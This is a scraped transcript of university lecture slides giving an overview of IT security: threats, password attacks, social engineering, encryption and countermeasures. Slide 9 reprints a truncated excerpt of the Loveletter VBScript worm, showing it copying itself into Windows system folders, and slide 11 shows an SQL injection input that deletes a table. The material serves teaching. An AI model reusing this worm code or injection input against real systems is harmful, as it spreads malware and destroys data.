© prof. till hänisch, prof. dr. hans jürgen ott 1 univ. of cooperative education heidenheim, dpt....
TRANSCRIPT
- Slide 1
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT security A quick tour Slide 2 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 2 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems The security problem is real. computer criminality recorded cases computer criminality credit card frauds Source: Bundeskriminalamt 2004, http://www.bka.de/ Slide 3 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 3 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Registered frauds. Quelle: CERT Coordination Center, Software Engineering Institute, Carnegie Mellon University http://www.cert.org/stats/, June 2005 Slide 4 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 4 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Internet criminality as shooting star. Source: Bundeskriminalamt 2004 http://www.bka.de computer criminality, especially credit card fraud data and program misuse hacking, spying computer frauds computer sabotage spying program piracy dealing with illegal copies of programs Trends in computer criminality in Germany Slide 5 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 5 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Overview l Overview l Some threats (some !) l Example Solutions Authentication Who is it ? Encryption Keep data confidential l What to do ? Slide 6 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 6 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Data Security: DIN 44300, Part 1. l protection of data (stored or transmitted) from destruction (loss, damage, manipulation) and from misuse l privacy protection: protection of persons from detractions by processing data about this persons spying fraud nonavailability sabotage Slide 7 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 7 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Security Criteria. l integrity consistency: data not contradictionary correctness: data correspond to reality DoS, DDoS, mail flooding l confidence data access only by authorized persons hacking l authenticity authentification of users data persistence fake orders spoofing l availability access to programs and data at any (intended) time by authorized persons spying fraud non- availability sabotage examples for security risks: computer viruses damage 2003 worldwide: 55 Billions $ Slide 8 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 8 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems MS Outlook Loveletter: love blinds.... @ MS Outlook @ @ @ @ @ @ @ @ @ @ @ Slide 9 =1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... rem barok -loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")...."> Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 9 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems A simple Visual Basic program. rem barok -loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... rem barok -loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... Slide 10 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 10 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems (relatively) latest viruses. time lags between discovery and prevention of new viruses Slide 11 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 11 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems similar: SQL-Injection....... File index.htm... $selstring = "SELECT * FROM sometable WHERE afield=$sstring'"; $conn = pg_Connect("localhost", "5432","","","somedb"); $result = pg_Exec($conn, $selstring);... File db-request.php Maier Maier; delete from sometable Slide 12 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 12 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Distributed Denial-of-Service Attack (DDoS). victim attack slave installing a demon master Hack attacker problems: separating "good" from "bad" requests router misconfiguration: buggy IP packages cancel router function Intrusion Detection Systems http://www.iss.net Slide 13 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 13 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Wardriving, LAN jacking: Invading mobile nets. Slide 14 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 14 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Countermeasures. availabilityauthenticityconfidenceintegrity intrusion detection digital signatures encryption VPN firewall access control backup password biometry virus protection Managed Security Services Slide 15 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 15 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Script Kiddies: Using of hacker tools without responsibility. Skills of attackers complexity of hacker tools source: c't 2/2002, S. 79 guessing of passwords viruses cracking of passwords intrusion into not secured system web worms Slide 16 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 16 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Example: prevent unauthorizised access. l user identification password, biometric methods, authentication methods l define user privileges who is authorized for access on which resources l admission control, access control firewall, Intrusion Detection Systems l encryption acces to data is possible but use of data is not possible Slide 17 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 17 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems lbrute force hack trying out all possible combinations of characters. ldictionary hack trying out a list of often used and well known passwords or dictionaries hybrid attack : combine dictionary password with numbers/characters lspying out looking over the shoulder infiltrating a trojan horse lSocial Engineering exploiting the naivity of persons who (dont) keep a secret i.E.: fake mail to employees with sender spoofing ("IT security dept.") and password request Recent study (BBC News) showed, that 92% of participating people revealed personal details like mothers maiden name, first school,... (Comm. ACM Vol. 48/6 p. 10) Password cracking. Slide 18 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 18 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Default passwords Slide 19 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 19 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Default passwords contd. Slide 20 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 20 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Social Engineering. With Java and JavaScript it is simple to implement a trojan horse which transmits the dial up password to the hacker. a popup window, imitating the dial up window to the ISP a message box dupes a connection breakdown Slide 21 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 21 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Social Engineering. original and fake Slide 22 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 22 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Beispiel Telekom Phishing mail Slide 23 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 23 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Biometry. hand geometry position of bones and knuckles facial recognition geometric position of eyes, nose; proportions Iris pattern around the pupil Retina vascular patterns on retina voice pattern of sound / frequency rhythm of speech handwriting speed, pressure, direction,... typing rhythm fingerprint Slide 24 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 24 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems eTokens. http://www.aks.com/ Slide 25 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 25 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Encryption Problem Data transmission over public (esp. Wireless) networks is public ! Solution Private network (expensive) or encryption: Sender applies (mathematical) function on message in a way that only (!) the receiver can recover the original sender: E = e(K,M) : K = key, M = message receiver: M = d(K,E) : E = encrypted message, works if M = d(K,e(K,M)) Slide 26 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 26 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems substitution chiffre Simple encryption technique: Replace every character by a different one The transformation is the key: Original alphabet: abcdefghijklmnopqrstuvwxyz Key: qfwgxbdkpjhyzstiarnouvcelm Encrypted text: q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk wkqrqwoxr Slide 27 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 27 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems cryptoanalysis Relative frequency of characters In encrypted textIn (english) text (publication) a 0.006 b 0.020 c 0.011 d 0.003 e 0.000 f 0.026 g 0.023 h 0.003 i 0.020 j 0.000 k 0.040 l 0.020 m 0.000 n 0.062 o 0.085 p 0.060 q 0.071 r 0.051 s 0.051 t 0.040 u 0.037 v 0.003 w 0.048 x 0.114 y 0.028 z 0.011 a 0.096 b 0.015 c 0.038 d 0.039 e 0.114 f 0.020 g 0.013 h 0.035 i 0.071 j 0.002 k 0.003 l 0.047 m 0.030 n 0.065 o 0.082 p 0.034 q 0.001 r 0.061 s 0.067 t 0.095 u 0.028 v 0.008 w 0.016 x 0.005 y 0.012 z 0.002 Slide 28 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 28 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Decrypted text a chiffre has to ensure equal probabilities for all characters to prevent simple frequency based analysis a simple substitution is not sufficient anybody with a bit of time or a computer can break such codes easily these codes were used until the nineteenth century and were replaced by codes that change the substitution pattern with each character Experiment: Message has a length of one character Is cryptoanalysis possible ? No ! If the key has equal length as the message, encryption is unbreakable ! (One time pad) Slide 29 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 29 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Enigma Slide 30 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 30 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems real encrytption techniques l Complex combination of substitution and transposition DES (old), AES (new) l Symmetric: Sender and receiver use the same key Problem: How to transmit the key to many partners long key (one time pad) Unsolved l Asymmetric: different keys Public/Private key Discrete mathematics: factorization of large prime numbers is difficult l Signature: one way functions Slide 31 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 31 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Protection of data transmission. l encryption access is useless for attackers l electronic certificates/signatures authentification of communication partners l combination: Virtual Private Network (VPN) data packages get unpacked and transmittet in a tunnel VPN-Client (i.e. firewall) VPN-Client confidence authentity Slide 32 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 32 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Security measures in use. 81 58 55 29 26 24 79 82 52 71 34 30 37 17 43 86 29 antivirus software Virtual Private Networks (VPN) automatic backup personal firewalls content filtering intrusion detection systems network firewalls application irewalls Dial-Back- or secure modems Germany USA source: IT-Security 2003; Juni-Juli, 2500 Interviews with CIOs; in Percent Slide 33 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 33 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Best practices that block most attacks. l Use an application layer firewall. l Automatically update your antivirus software at the gateway, server and client. l Keep all of your systems and applications updated. Hackers commonly break into a Web site through known security holes, so make sure your servers and applications are patched and up to date. l Turn off unnecessary network services. l Remove all unneeded programs. l Scan network for common backdoor services - Use intrusion detection systems, vulnerability scans, antivirus protection. Slide 34 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 34 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Problems with secure systems l Easy to block most (simple) attacks l How to block qualified attackers ? l Tradeoff: security usabilitycost Problem: Bad usability can lead to bad security: restrictive password policy --> hard to remember --> people write passwords down on paper Slide 35 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 35 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Clever solutions..... l Instead of passwords, ask personal questions personal entropy Name of your most loved pet ? The name of Paris Hiltons dog is Tinkerbell Her T-Mobile account was hacked l Logins are blocked after some unsuccessfull attempts (typ. 3) You are bidding on something at ebay, you know your hardest contrahents name, try to log in with his account and some password --> his account will be blocked --> Denial of Service attack l What would happen, if ATMs would require your fingerprint ? Maybe less frauds ? Maybe more people will be robbed ? (See cars with engine immobilisers) Slide 36 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 36 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems You can use the most advanced technology... Slide 37 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 37 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Someone will find a way to break your system if he really wants... Slide 38 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 38 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems You can just make his life a little harder... Slide 39 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 39 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems There is no secure system l Dont trust anybody who tells you he can built an absolutely secure system: Hes either naive or lying Weakest link counts (possibly out of your control) SQL-Slammer took out 20% of ATM machines in US (costed banks tens of millions of dollars), Continental coudnt fly for 12 hours, why ? Not the servers were vulnerable, but the network connections were overloaded. l Design problems (protocols, languages,...) not designed for todays use Solutions are known but hard to use, example: no stack protection in many languages Manipulations are possible, like for example Buffer overflows could be avoided but are often not (more work) SQL-injection could be avoided but is often not (more work) l Programming errors (bugs) allow exploits, patches are always late (zero day exploits) l (better) processes can help avoiding problems Slide 40 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 40 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Level of security l How much security do you need ? Analyze data, risks,... Online weather forecast vs. Online-banking l How much security do you want ? Usability Cost l Methods for dealing with risks technical organizational (education,...) l No silver bullet l Security services are (and will be even more) good business Communications of the ACM Vol 48/6 pp. 82 Slide 41 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 41 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Security conception. preconditions: security goals actual state system limits preconditions: security goals actual state system limits specification of security objects policy conception damage analysis risk analysis threat analysis updating the conception Security Policy recognising threats evaluating threats avoiding threats Slide 42 Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 42 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems risk estimation of the used security tools certificates, certification authorities problem: estimation of the residual risk security standards security standards A final risk remains... overall risk without security prcedures overall risk without security prcedures risk prevention firewall intrusion detection risk prevention firewall intrusion detection risk reduction education virus tools risk reduction education virus tools risk shifting insurance risk shifting insurance residual risk